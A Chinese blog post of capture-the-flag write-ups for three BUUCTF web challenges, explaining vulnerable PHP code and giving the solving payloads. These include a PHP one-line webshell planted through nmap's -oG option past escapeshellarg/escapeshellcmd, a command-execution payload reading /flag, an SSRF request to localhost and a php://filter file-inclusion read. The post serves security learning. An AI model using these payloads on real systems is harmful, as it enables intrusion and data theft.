BUUCTF刷题记录

最新推荐文章于 2024-05-06 09:17:00 发布
最新推荐文章于 2024-05-06 09:17:00 发布
阅读量1k 收藏 25
点赞数 20
分类专栏: 各种ctf的wp合集 ctf 文章标签: android 网络安全 web安全 安全 BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76690905/article/details/135525620
版权

 [BUUCTF 2018]Online Tool

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

首先,它从GET请求中获取名为"host"的参数,并将其赋值给变量$host。

接下来,代码使用escapeshellarg()函数对$host进行转义,以防止命令注入攻击。这个函数会在字符串的开头和结尾添加单引号,会将其中的单引号字符'加一个转义符,再加上一对单引号进行链接单,转义为'\''

然后,代码使用escapeshellcmd()函数对host进行更严格的过滤。这个函数会删除字符串中的一些特殊字符,包括`\0`、`\n`、`\r`、`\t`、`\`、`;`、`|`、`&`和``,防止恶意用户利用这些特殊字符执行任意的Shell命令。(所以&&和||这些是用不了了)

接下来,代码生成一个唯一的沙盒目录名。它使用md5()函数生成一个哈希值,结合字符串"glzjin"和客户端的IP地址(通过$_SERVER['REMOTE_ADDR']获取),以确保沙盒目录名的唯一性。(生成目录名)

然后,代码使用mkdir()函数创建了一个以沙盒目录名为名称的目录。如果目录已存在,则会返回警告,使用@符号可以抑制这个警告。(生成目录)

通过chdir()函数将当前目录切换到沙盒目录。

最后,代码使用system()函数执行了一个Nmap命令,扫描目标主机。Nmap命令的参数包括一些选项(如-T5-sT-Pn--host-timeout 2-F)以及$host变量(经过转义和过滤后的)。

扫描结果通过echo语句输出到浏览器。

第一个if语句没有else,影响不大,第二个if语句用了escapeshellarg和escapeshellcmd函数进行过滤,但是这两个函数共同使用时就会产生逻辑漏洞;这里用的是nmap命令。可以使用nmap的写文件功能写入一句话木马或者利用system来RCE,Nmap命令行中加入“-oG <filename>”选项,则Nmap会将扫描结果写入到指定的文件中,而不是在终端输出。

构造payload:

?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '

把这串东西拼接到靶场地址后面,蚁剑链接http://靶场地址/沙箱地址/hack.php

蚁剑链接flag在根目录下

直接RCE:

?host=' <?php echo `cat /flag`;?> -oG a.php '

 然后访问沙县目录下的a.php

相关文章:

PHP escapeshellarg()+escapeshellcmd() 之殇

BUUCTF [BUUCTF 2018] Online Tool_buuctf 2018 web 在线工具-CSDN博客

[HNCTF 2022 WEEK2]ez_ssrf

<?php

highlight_file(__FILE__);
error_reporting(0);

$data=base64_decode($_GET['data']);
$host=$_GET['host'];
$port=$_GET['port'];

$fp=fsockopen($host,intval($port),$error,$errstr,30);
if(!$fp) {
    die();
}
else {
    fwrite($fp,$data);
    while(!feof($data))
    {
        echo fgets($fp,128);
    }
    fclose($fp);
}

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

手写127.0.0.1请求头格式构建一个 HTTP GET 请求,请求的目标地址是 127.0.0.1 上的 flag.php 文件,然后base64编码

GET /flag.php HTTP/1.1

Host: 127.0.0.1

Connection: Close

Payload:

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

相关文章:

https://www.cnblogs.com/xuey/p/8463009.html

[BSidesCF 2020]Had a bad day

点击按钮可以看猫狗图片,由category参数后的文件名控制,但是无法直接读取flag文件或者index文件,这里尝试伪协议读取index.php文件:

/?category=php://filter/read=convert.base64-encode/resource=index

 查看源码再复制

解码后看见关键代码:

              <?php
                $file = $_GET['category'];

                if(isset($file))
                {
                    if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
                        include ($file . '.php');
                    }
                    else{
                        echo "Sorry, we currently only support woofers and meowers.";
                    }
                }
                ?>

代码从GET请求中获取名为"category"的参数,并将其赋值给变量$file,接下来代码检查$file变量是否已设置。如果已设置,则继续执行。否则,代码不会执行任何操作。

然后,代码使用strpos()函数检查file变量是否包含“woofers”、“meowers”或“index”子字符串。如果包含其中之一,则通过include()函数加载相应的PHP文件。例如,如果file的值为“woofers”,则代码将加载woofers.php文件。如果$file的值不包含这些子字符串,则代码返回一个错误消息,指示当前仅支持woofers和meowers分类。

payload:

/?category=php://filter/read=convert.base64-encode/woofers/resource=flag

在路径字符串中使用php://filter/read=convert.base64-encode/woofers/resource=flag时,woofers被包含在字符串中,因此会触发条件语句执行文件包含命令。由于这个路径中使用了php://filter伪协议,因此include语句会尝试将以Base64编码形式返回的flag.php文件内容解码,并将其作为PHP代码执行,读取的实际上是根目录下的flag.php文件

时代少年团队长乌萨奇的颜值一直被质疑
关注
  • 20
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
php代码审计之变量覆盖漏洞 变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等。 全局变量覆盖 extarct()变量覆盖 遍历初始化变量 import_request_variables变量覆盖 parse_str()变量覆盖 变量覆盖的种类 全局变量覆盖(PHP5.3.0废弃、PHP5.4.0移除) 当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单、cookie等 "; if(ini_get("Register_globals"))foreach ($_REQUEST as $k => $v) unset(${$k}); print $a; print $_GET[b]; ?> extract()变量覆盖 PHP extract()函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素,键名用于变量值
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): #print s
BasicASM.s(BUUCTF
06-04
分析过程文件
Buuctf 刷题记录
m0_62706061的博客
10-12 1637
php反序列化绕过之,过滤\00*\00等
buuctf刷题记录24 equation
ytj00的博客
08-08 455
这道题又一次加强了我的z3 题目有个html打开得到 根据题目提示这个是f**k加密 可以到在线网站上一个个去解密,但是太麻烦了,用了个网上的脚本, 得到 最后有一个常量没解,放到上面网站解出81 头疼,全是解方程,可以用z3来解 构造脚本麻烦死了, from z3 import * if __name__ == "__main__": s = Solver() l = [Int('l[%d]' % i) for i in range(42)] #定义l[0] - l[41
BuuCTF刷题记录
mr_xioabai的博客
11-08 103
嘿嘿绕过去了并没发现flag,但是看到了cat命令并没有在usr目录下而是在根目录的bin目录下。尝试一下读取文件cat发现失败了,不知道啥原因,发现cat,nl等命令都无法执行。怀疑有preg_match函数匹配,先用回车符%0A绕过试试。直接用bin目录下的cat查看当前目录的index.php。需要我们传一个cmd为json格式的那就随便传传。成功拿到源码,其实也无所谓了直接rce就行了。先看看当前目录存在哪些文件。
BUUCTF 刷题记录
best_Floats的博客
05-25 952
然后再用ls查看,发现一个flag.txt文件,用cat命令进行查看,就可以看到flag了。先用ls命令看看有什么东西没有,发现没有返回的东西,说明一开始就进去了一个空的文件夹。这道题主要考查的是ssh的知识,需要远程用ssh连接上这台虚拟机。这时我们可以用cd..这个命令去返回上一级。格式是:ssh -p 端口 用户名@网址。然后输入yes和密码,就成功连接上。打开了这个网页之后其实并没有什么用。我们需要通过主机cmd去用ssh链接。题目中给了地址、端口、账号和密码。
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
buuctf刷题记录10 [ACTF新生赛2020]usualCrypt
ytj00的博客
07-30 917
ida打开,进入main函数 有一个关键函数,和一个关键比较 先进入关键函数里面 最开始有一个sub_401000()函数,进入后 感觉有点像base64加密,然后这个函数是变换base64的码表,写脚本将变换后的码表求出来 #include <stdio.h> int main() { char b[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; char c; int i=6; print
buuctf刷题记录4 [GUET-CTF2019]re
ytj00的博客
07-30 720
先查壳,发现是upx加壳,脱壳后,拖进ida里面查看 逻辑很简单,很容易就找到关键函数 if ( 1629056 * *a1 != 166163712 ) return 0LL; if ( 6771600 * a1[1] != 731332800 ) return 0LL; if ( 3682944 * a1[2] != 357245568 ) return 0LL; if ( 10431000 * a1[3] != 1074393000 ) return 0LL
buuctf刷题记录17 [GUET-CTF2019]number_game
ytj00的博客
08-01 486
ida打开进入主函数 先看第一个if里面的函数 首先是判断输入长度是否为10,然后逐个检查输入的字符是否是在0到4之间 然后我们看主函数中第二个if里的函数sub_400917 自己看没看懂…看了看别人的wp才知道这是个数独游戏(第一次接触这种题),这个是个5*5的数独游戏其中行和列都不能有重复的 14#23 30#1# 0#23# #3##0 42##1 就是这个样子,不考虑中间那些函数,我们应该输入0421421430,输入以后不对,应该是中间的函数做了某些调换或者其他操作 然后,sub_40
buuctf刷题记录
mackilo的博客
02-19 3955
2022-1-16 reverse2 扔到IDA64里解析, F5生成伪代码 通过分析得出经过一定的变换后与flag进行比较的 查看flag的值,是{hacking_for_fun} 再返回前面看如何对flag进行变换的,将105、114、49转换成值, 箭头所指的函数功能为,把flag中存在的’i’以及’r’转换成’1’,进而得出正确flag。 2022-1-17 内涵的软件 下载好以后发现是乱码的exe文件,拖到ExeinfoPE里查看信息, 没有加壳,用IDA打开,查看main函数 可以看到跳
Buuctf刷题记录
weixin_51706044的博客
09-29 690
[HCTF 2018]WarmUp 这是一道关于代码审计的题通过查看源代码发现了source.php的源文件进入查看 ` <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; .
厂家自定义 Android Ant编译流程源码分析
结合项目案例,记录点点滴滴,自己回顾,分享他人o__o
05-06 415
我的是:(E:\Tool\Windows\adt-bundle-windows-x86-20130729\sdk\tools\ant)上面主要是配置依赖工程,你可以手动改,当然默认的是用eclipse配置的工程的时候利用ADT插件自动生成的。其他的差异不用管,只管上面两行就可以了,每个ant版本的内容是不一样的,只要和自己的sdk对应就可以了。上述模块基本上把所有的情况都考虑到了,大家只要按照自己工程的实际需求改改就可以了,把没有用的删除。找到自己安装目录下的build.xml。解压ant的包到本地目录。
Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 1855
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF(Server Side Request Forgery)漏洞,可以通过对内网web应用实施攻击获取webshell。因此,在buuctf web题目中,可能需要掌握SSRF漏洞的利用和对web应用的渲染函数(render函数)进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【CTF】buuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【BUUCTF刷题Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [BUUCTFWeb真题学习整理(一)](https://blog.csdn.net/qq_41429081/article/details/98042205)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值